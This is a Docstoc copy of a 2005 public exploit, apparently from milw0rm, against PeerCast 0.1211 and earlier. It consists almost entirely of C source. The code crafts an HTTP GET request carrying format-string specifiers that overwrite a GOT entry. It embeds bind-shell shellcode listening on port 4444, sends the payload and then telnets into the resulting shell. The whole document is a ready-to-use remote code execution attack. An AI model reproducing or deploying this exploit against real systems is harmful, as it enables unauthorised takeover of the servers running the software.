Docstoc

PeerCast 0.1211 Remote Format String Exploit

Document Sample
PeerCast 0.1211 Remote Format String Exploit Powered By Docstoc
					                                   PeerCast 0.1211 Remote Format String Exploit   Page 1/4
  1    /*
  2    \               PeerCast <= 0.1211 remote format string exploit
  3    /                            [<< Public Release >>]
  4    \
  5    / by Darkeagle [ darkeagle [at] linkin−park [dot] cc ]
  6    \
  7    /       uKt researcherz [ http://unl0ck.org ]
  8    \
  9    / greetz goes to: uKt researcherz.
  10   \
  11   /
  12   \ − smallest code − better code!!!
  13   /
  14   */
  15
  16   #include   <stdio.h>
  17   #include   <stdlib.h>
  18   #include   <stdarg.h>
  19   #include   <string.h>
  20   #include   <sys/types.h>
  21   #include   <sys/socket.h>
  22   #include   <netinet/in.h>
  23   #include   <arpa/inet.h>
  24   #include   <unistd.h>
  25   #include   <netdb.h>
  26
  27
  28   //*******************************************
  29   #define doit( b0, b1, b2, b3, addr ) { \
  30                b0 = (addr >> 24) & 0xff; \
  31                b1 = (addr >> 16) & 0xff; \
  32                b2 = (addr >> 8) & 0xff; \
  33                b3 = (addr      ) & 0xff; \
  34   }
  35   //*******************************************
  36
  37
  38
  39   //****************************************************************
  40   char shellcode[] = // binds 4444 port
  41   "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
  42   "\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
  43   "\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
  44   "\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
  45   "\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
  46   "\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
  47   "\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
  48   //****************************************************************
  49
  50
  51   //****************************
  52   #define HOST "127.0.0.1"
darkeagle                                                                         06/20/2005
                                       PeerCast 0.1211 Remote Format String Exploit                  Page 2/4
  53    #define PORT 7144
  54    #define GOTADDR 0x0809da9c
  55    #define SHELLADDR 0x49adb23c
  56    //****************************
  57
  58
  59
  60    //****************************************************************************************
  61    char *
  62    evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
  63    {
  64      char * buf;
  65      unsigned char b0, b1, b2, b3;
  66      int start = 256;
  67
  68      doit( b0, b1, b2, b3, retaddr );
  69      buf = (char *)malloc(999);
  70      memset( buf, 0, 999 );
  71
  72     b3   −=   figure;
  73     b2   −=   figure;
  74     b1   −=   figure;
  75     b0   −=   figure;
  76
  77     snprintf( buf, 999,
  78               "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
  79                 b3 − 16 + start − base, offset,
  80                 b2 − b3 + start, offset + 1,
  81                 b1 − b2 + start, offset + 2,
  82                 b0 − b1 + start, offset + 3 );
  83
  84      return buf;
  85    }
  86    //****************************************************************************************
  87
  88
  89
  90
  91    //****************************************************************************************
  92    int
  93    main( int argc, char * argv[] )
  94    {
  95      struct sockaddr_in addr;
  96      int sock;
  97      char * fmt;
  98      char endian[31337], da_shell[31337];
  99      unsigned long locaddr, retaddr;
  100     unsigned int offset, base;
  101     unsigned char b0, b1, b2, b3;
  102
  103    system("clear");
  104    printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n");
darkeagle                                                                                            06/20/2005
                                      PeerCast 0.1211 Remote Format String Exploit                                       Page 3/4
  105    printf("*^*^*^             by Darkeagle             ^*^*^*\n");
  106    printf("*^*^*^     uKt researcherz [ http://unl0ck.org ]  ^*^*^*\n\n");
  107
  108    memset( endian, 0x00, 31337 );
  109    memset( da_shell, 0x00, 31337 );
  110
  111    addr.sin_family = AF_INET;
  112    addr.sin_port = htons(PORT);
  113    addr.sin_addr.s_addr = inet_addr(HOST);
  114
  115    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
  116
  117    locaddr = GOTADDR;
  118    retaddr = SHELLADDR;
  119    offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141
  120
  121    doit( b0, b1, b2, b3, locaddr );
  122
  123    base = 4;
  124    printf("[*] Buildin’ evil code\n");
  125    strcat(endian, "GET /html/en/index.html");
  126    snprintf( endian+strlen(endian), sizeof(endian),
  127               "%c%c%c%c"
  128               "%c%c%c%c"
  129               "%c%c%c%c"
  130               "%c%c%c%c",
  131                 b3, b2, b1, b0,
  132                 b3 + 1, b2, b1, b0,
  133                 b3 + 2, b2, b1, b0,
  134                 b3 + 3, b2, b1, b0 );
  135
  136   fmt = evil_builder( retaddr, offset, base, 0x10 );
  137
  138   memset(fmt+strlen(fmt), 0x55, 32);
  139   strcat(fmt, shellcode);
  140   strcat(endian, fmt);
  141   strcat(endian, "\r\n\r\n\r\n");
  142   printf("[+] Buildin’ complete!\n");
  143   sprintf(da_shell, "telnet %s 4444", HOST);
  144
  145   // just go, y0!
  146   printf("[*] Connectin’\n");
  147   if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) { printf("[−] Connection failed!\n\n"); exit(0); }
  148
  149   printf("[+] Connected!\n");
  150   printf("[*] Sleepin’\n");
  151   sleep(1);
  152
  153   printf("[*] Sendin’\n");
  154   send(sock, endian, strlen(endian), 0);
  155
  156   printf("[*] Sleepin’\n");
darkeagle                                                                                                                06/20/2005
                                        PeerCast 0.1211 Remote Format String Exploit                 Page 4/4
  157    sleep(1);
  158
  159    printf("[*] Connectin’ in da shell\n\n");
  160    sleep(1);
  161    system(da_shell);
  162    return 0;
  163   }
  164   //****************************************************************************************
  165
  166   // milw0rm.com [2005−06−20]




darkeagle                                                                                            06/20/2005

				
DOCUMENT INFO